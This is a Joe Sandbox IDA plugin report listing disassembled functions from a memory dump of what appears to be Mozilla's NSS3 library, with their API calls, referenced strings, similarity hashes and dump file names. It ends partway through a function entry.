Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 5225dbbf15e1cedd92f89afcb521ae2d6549b2e98cba24adf5f792a049fe5aba
Instruction ID: deeae7a7080d6960f52c17568f2b68da0479ab9f68e9c42402d61497a8603bd1
Opcode Fuzzy Hash: 5225dbbf15e1cedd92f89afcb521ae2d6549b2e98cba24adf5f792a049fe5aba
Instruction Fuzzy Hash: BC71D176D102059FEB10AF24E88196ABBB4FF45318F044668EC5CAB312F735EA50CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA9B40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetInterface), ref: 6BCA9B5C
PR_LogPrint.NSS3( pInterfaceName = 0x%p,?), ref: 6BCA9B77

Part of subcall function 6BD809D0: PR_Now.NSS3 ref: 6BD80A22
Part of subcall function 6BD809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BD80A35
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BD80A66
Part of subcall function 6BD809D0: PR_GetCurrentThread.NSS3 ref: 6BD80A70
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BD80A9D
Part of subcall function 6BD809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BD80AC8
Part of subcall function 6BD809D0: PR_vsmprintf.NSS3(?,?), ref: 6BD80AE8
Part of subcall function 6BD809D0: EnterCriticalSection.KERNEL32(?), ref: 6BD80B19
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80B48
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80C76
Part of subcall function 6BD809D0: PR_LogFlush.NSS3 ref: 6BD80C7E

PR_LogPrint.NSS3( pVersion = 0x%p,?), ref: 6BCA9B92

Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80B88
Part of subcall function 6BD809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6BD80C5D
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BD80C8D
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80C9C
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80CD1
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BD80CEC
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80CFB
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80D16
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BD80D26
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80D35
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6BD80D65
Part of subcall function 6BD809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BD80D70
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80D90
Part of subcall function 6BD809D0: free.MOZGLUE(00000000), ref: 6BD80D99

PR_LogPrint.NSS3( ppInterface = 0x%p,?), ref: 6BCA9BAB

Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BD80BAB
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80BBA
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80D7E

PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6BCA9BC4

Part of subcall function 6BD809D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BD80BCB
Part of subcall function 6BD809D0: EnterCriticalSection.KERNEL32(?), ref: 6BD80BDE
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80C16

Strings

pVersion = 0x%p, xrefs: 6BCA9B8D
flags = 0x%x, xrefs: 6BCA9BBF
pInterfaceName = 0x%p, xrefs: 6BCA9B72
C_GetInterface, xrefs: 6BCA9B57
ppInterface = 0x%p, xrefs: 6BCA9BA6

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: flags = 0x%x$ pInterfaceName = 0x%p$ pVersion = 0x%p$ ppInterface = 0x%p$C_GetInterface
API String ID: 420000887-3081037825
Opcode ID: fd2bdb4fc0d7ae0edbf189ab79e80ea1c6999ae56d79e64e91b4d98db3912944
Instruction ID: 7df4356a1498581bef672d88fe481d762b3778719a46cc63d7d79d5c88a3231a
Opcode Fuzzy Hash: fd2bdb4fc0d7ae0edbf189ab79e80ea1c6999ae56d79e64e91b4d98db3912944
Instruction Fuzzy Hash: BC21F835111106AFEB00AF64DC8AF59BBA1EBC636DF088061E5489F152E779CA44CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA2AF0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismList), ref: 6BCA2B0C
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6BCA2B59

Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BD80BAB
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80BBA
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80D7E

PR_LogPrint.NSS3( pMechanismList = 0x%p,?), ref: 6BCA2B3E

Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80B88
Part of subcall function 6BD809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6BD80C5D
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BD80C8D
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80C9C
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80CD1
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BD80CEC
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80CFB
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80D16
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BD80D26
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80D35
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6BD80D65
Part of subcall function 6BD809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BD80D70
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80D90
Part of subcall function 6BD809D0: free.MOZGLUE(00000000), ref: 6BD80D99

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6BCA2B25

Part of subcall function 6BD809D0: PR_Now.NSS3 ref: 6BD80A22
Part of subcall function 6BD809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BD80A35
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BD80A66
Part of subcall function 6BD809D0: PR_GetCurrentThread.NSS3 ref: 6BD80A70
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BD80A9D
Part of subcall function 6BD809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BD80AC8
Part of subcall function 6BD809D0: PR_vsmprintf.NSS3(?,?), ref: 6BD80AE8
Part of subcall function 6BD809D0: EnterCriticalSection.KERNEL32(?), ref: 6BD80B19
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80B48
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80C76
Part of subcall function 6BD809D0: PR_LogFlush.NSS3 ref: 6BD80C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6BCA2BC0

Strings

pMechanismList = 0x%p, xrefs: 6BCA2B39
*pulCount = 0x%x, xrefs: 6BCA2BBB
pulCount = 0x%p, xrefs: 6BCA2B54
slotID = 0x%x, xrefs: 6BCA2B20
C_GetMechanismList, xrefs: 6BCA2B07

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: DebugOutputPrintStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pMechanismList = 0x%p$ pulCount = 0x%p$ slotID = 0x%x$C_GetMechanismList
API String ID: 1342304006-3652739913
Opcode ID: 51cfb01ba6dceeb33cf49228b0c501ced8b3fee865e28669778f04ef32f9fd69
Instruction ID: 225b654c28c42b8d418f2be29f17652379f1928c8a55d1e36fb2c3426818c92b
Opcode Fuzzy Hash: 51cfb01ba6dceeb33cf49228b0c501ced8b3fee865e28669778f04ef32f9fd69
Instruction Fuzzy Hash: 6C214C31511111EFEB00DF65EC85E44B764FBC636DF088068E845DF261E738DA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCF6BA0 Relevance: 16.7, APIs: 11, Instructions: 248COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,?,?,?,6BD00293), ref: 6BCF6BC2
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BCF6C13
NSS_GetAlgorithmPolicy.NSS3(?), ref: 6BCF6C39
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BCF6C6C
NSS_GetAlgorithmPolicy.NSS3(00000146,?), ref: 6BCF6CAB
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BCF6CEE
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BCF6D2A
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BCF6D6D
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BCF6DBD
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BCF6E13
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BCF6EE9

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Error$AlgorithmPolicy
String ID:
API String ID: 644051021-0
Opcode ID: 1e6d710300a051eaf4099b0faf862a6fb132d3f7dcba159dd4649bd3841ac955
Instruction ID: 2e3372a2411942e943715aefd5a81a872c02c0e1eebe2884862dc8b743e07d4f
Opcode Fuzzy Hash: 1e6d710300a051eaf4099b0faf862a6fb132d3f7dcba159dd4649bd3841ac955
Instruction Fuzzy Hash: E9910432E249458BEB408BACCC517A87739AF42728F1443F6D096AF2D1F3299747C361

Uniqueness

Uniqueness Score: -1.00%

Function 6BC95B40 Relevance: 16.7, APIs: 11, Instructions: 200stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,6BCC5419,00000000,00000000), ref: 6BC95B59

Part of subcall function 6BD1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BD1C2BF

PR_NewLock.NSS3(?,?,6BCC5419,00000000,00000000), ref: 6BC95B96
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6BCC5512,?,?,6BCC5419,00000000,00000000), ref: 6BC95C22
memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,6BCC5419,00000000,00000000), ref: 6BC95C42
PR_NewLock.NSS3(?,?,?,?,?,?,?,6BCC5419,00000000,00000000), ref: 6BC95C7E

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Lock$ErrorValuememcpystrlen
String ID:
API String ID: 2948281689-0
Opcode ID: c4bd2655d7abd5c952b8d94397ad116f415f6621824cde7698bbd610cb5345d3
Instruction ID: 966db01eb08ea1cfd52036da16cc46aec35ddf6a0b56c67b056eb58f1c04931a
Opcode Fuzzy Hash: c4bd2655d7abd5c952b8d94397ad116f415f6621824cde7698bbd610cb5345d3
Instruction Fuzzy Hash: A671ADB1D113159FEB00DF74E981A6ABBF8BF04319F144069E9189B341F779EA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BD82AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BD82AE8
strdup.MOZGLUE(00000000), ref: 6BD82AFA
PR_ExitMonitor.NSS3 ref: 6BD82B0B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6BD82B1E
strdup.MOZGLUE(.;\lib), ref: 6BD82B32
PR_ExitMonitor.NSS3 ref: 6BD82B4A
PR_SetError.NSS3(FFFFE890,00000000), ref: 6BD82B59

Strings

LD_LIBRARY_PATH, xrefs: 6BD82B19
.;\lib, xrefs: 6BD82B29, 6BD82B31

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Monitor$Exitstrdup$EnterErrorgetenv
String ID: .;\lib$LD_LIBRARY_PATH
API String ID: 2438426442-3838498337
Opcode ID: 039e4c6f8e59613f1e50c965ab0c268118013b7e51359bacfc91040f7140f5b6
Instruction ID: 7f818598d6c3afb77a5361d55166380117d31326a9398b30a7b99f458e28858a
Opcode Fuzzy Hash: 039e4c6f8e59613f1e50c965ab0c268118013b7e51359bacfc91040f7140f5b6
Instruction Fuzzy Hash: BC01A7B5D40121A7FA105BB49C06A167758DB5226DF080074E84ADD112FB3DD924C7DB

Uniqueness

Uniqueness Score: -1.00%

Function 6BD0AB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6BD0A6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6BD080C1), ref: 6BD0A6F9
Part of subcall function 6BD0A6D0: memcpy.VCRUNTIME140(00000210,6BDD0BEC,0000011C), ref: 6BD0A869

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6BD080AD), ref: 6BD0AB48

Part of subcall function 6BCCFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BCC8D2D,?,00000000,?), ref: 6BCCFB85
Part of subcall function 6BCCFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BCCFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,?,6BD080AD), ref: 6BD0AB8E
PORT_Strdup_Util.NSS3(?,?,?,?,?,6BD080AD), ref: 6BD0ABA7
memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6BD080AD), ref: 6BD0ABFE
memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6BD080AD), ref: 6BD0AC1C
memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6BD080AD), ref: 6BD0AC48

Part of subcall function 6BD05BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6BD080E3,00000000), ref: 6BD05BD6
Part of subcall function 6BD05BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6BD080E3,00000000), ref: 6BD05BED
Part of subcall function 6BD05BC0: PR_EnterMonitor.NSS3(07890478,?,?,6BD080E3,00000000), ref: 6BD05C04
Part of subcall function 6BD05BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6BD080E3,00000000), ref: 6BD05C1B
Part of subcall function 6BD05BC0: PR_Unlock.NSS3(0140BCE8,?,?,6BD080E3,00000000), ref: 6BD05C4C
Part of subcall function 6BD05BC0: PR_Unlock.NSS3(08C48300,?,?,6BD080E3,00000000), ref: 6BD05C5F
Part of subcall function 6BD05BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6BD080E3,00000000), ref: 6BD05C76
Part of subcall function 6BD05BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6BD080E3,00000000), ref: 6BD05C8D
Part of subcall function 6BD05BC0: PR_ExitMonitor.NSS3(07890478,?,?,6BD080E3,00000000), ref: 6BD05CA4
Part of subcall function 6BD05BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6BD080E3,00000000), ref: 6BD05CBB

PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6BD080AD), ref: 6BD0ACED

Part of subcall function 6BCD0D30: calloc.MOZGLUE ref: 6BCD0D50
Part of subcall function 6BCD0D30: TlsGetValue.KERNEL32 ref: 6BCD0D6D

PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6BD080AD), ref: 6BD0AD52
SECKEY_CopyPrivateKey.NSS3(?), ref: 6BD0AEE5
SECKEY_CopyPublicKey.NSS3(?), ref: 6BD0AEFC

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
String ID:
API String ID: 3422837898-0
Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction ID: c38f724c3f22c53d23b42e8618f9e10dd5cb421cc2d96ff46a20fabc3c09d6e6
Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction Fuzzy Hash: B0D1D9B5A016028FDB44CF28C481BA5B7E5BF48314F0982B9DC1DDF746EB34A994CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC7BB90 Relevance: 15.2, APIs: 10, Instructions: 187memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6BC906A0: TlsGetValue.KERNEL32 ref: 6BC906C2
Part of subcall function 6BC906A0: EnterCriticalSection.KERNEL32(?), ref: 6BC906D6
Part of subcall function 6BC906A0: PR_Unlock.NSS3 ref: 6BC906EB

PORT_NewArena_Util.NSS3(00001000), ref: 6BC7BC24
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6BC7BC39
PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6BC7BC58
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6BC7BCBE
CERT_DestroyCertificate.NSS3(?), ref: 6BC7BCDA
PR_SetError.NSS3(FFFFE00D,00000000), ref: 6BC7BD04
CERT_DestroyCertificate.NSS3(?), ref: 6BC7BD13
CERT_DestroyCertificate.NSS3(00000000), ref: 6BC7BD35
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BC7BD58
CERT_DestroyCertificate.NSS3(?), ref: 6BC7BD88

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$CertificateDestroy$Alloc_ArenaArena_$CopyCriticalEnterErrorFreeItem_SectionUnlockValue
String ID:
API String ID: 401161163-0
Opcode ID: cd5fd63e5e4391c6de62db5e1e1bc0140533d439d74905011aa7e4c379727584
Instruction ID: 799b14f9d8fb0039cf5754481c2c6239cc80b3002400f75ceee288751075e927
Opcode Fuzzy Hash: cd5fd63e5e4391c6de62db5e1e1bc0140533d439d74905011aa7e4c379727584
Instruction Fuzzy Hash: 4051B3B5E113059BEB10DF79DC92A9EBBF5AF98248F048438E81997345FB38E604CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BD14A70 Relevance: 15.1, APIs: 10, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000048,00000A20,0000032C,?,00000000,?,6BD0AEC0,00000A20,00000000), ref: 6BD14A8B

Part of subcall function 6BCD0D30: calloc.MOZGLUE ref: 6BCD0D50
Part of subcall function 6BCD0D30: TlsGetValue.KERNEL32 ref: 6BCD0D6D

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,00000000), ref: 6BD14AAA

Part of subcall function 6BCCFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BCC8D2D,?,00000000,?), ref: 6BCCFB85
Part of subcall function 6BCCFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BCCFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,00000000), ref: 6BD14ABD

Part of subcall function 6BCD0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6BC72AF5,?,?,?,?,?,6BC70A1B,00000000), ref: 6BCD0F1A
Part of subcall function 6BCD0F10: malloc.MOZGLUE(00000001), ref: 6BCD0F30
Part of subcall function 6BCD0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BCD0F42

SECITEM_CopyItem_Util.NSS3(00000000,00000020,?,?,?,?,?,00000000), ref: 6BD14AD6
SECITEM_CopyItem_Util.NSS3(00000000,00000034,?,?,?,?,?,?,?,?,00000000), ref: 6BD14AEC

Part of subcall function 6BCCFB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6BCC8D2D,?,00000000,?), ref: 6BCCFB9B

SECITEM_ZfreeItem_Util.NSS3(00000020,00000000,?,?,?,00000000), ref: 6BD14B49
SECITEM_ZfreeItem_Util.NSS3(-00000034,00000000,?,?,?,?,?,00000000), ref: 6BD14B58
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6BD14B64
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BD14B74
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6BD14B7E

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Item_$Alloc_CopyZfree$freememcpy$ArenaStrdup_Valuecallocmallocstrlen
String ID:
API String ID: 476651045-0
Opcode ID: 54ac02497704d3c7ef69afbaef0cf38bd6e119c9f1979f9a17e2c8f8379fc762
Instruction ID: f7bcd4d57fc7b4301501e3f55726f8007f4a8a8aa3ecd657a56f1b8f3a304388
Opcode Fuzzy Hash: 54ac02497704d3c7ef69afbaef0cf38bd6e119c9f1979f9a17e2c8f8379fc762
Instruction Fuzzy Hash: 5C318DB5A042059FD714CF25ED86A57BBB8EF18258B048469ED4ACB202F735E605CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BD05BC0 Relevance: 15.1, APIs: 10, Instructions: 83COMMON

Download Yara Rule

APIs

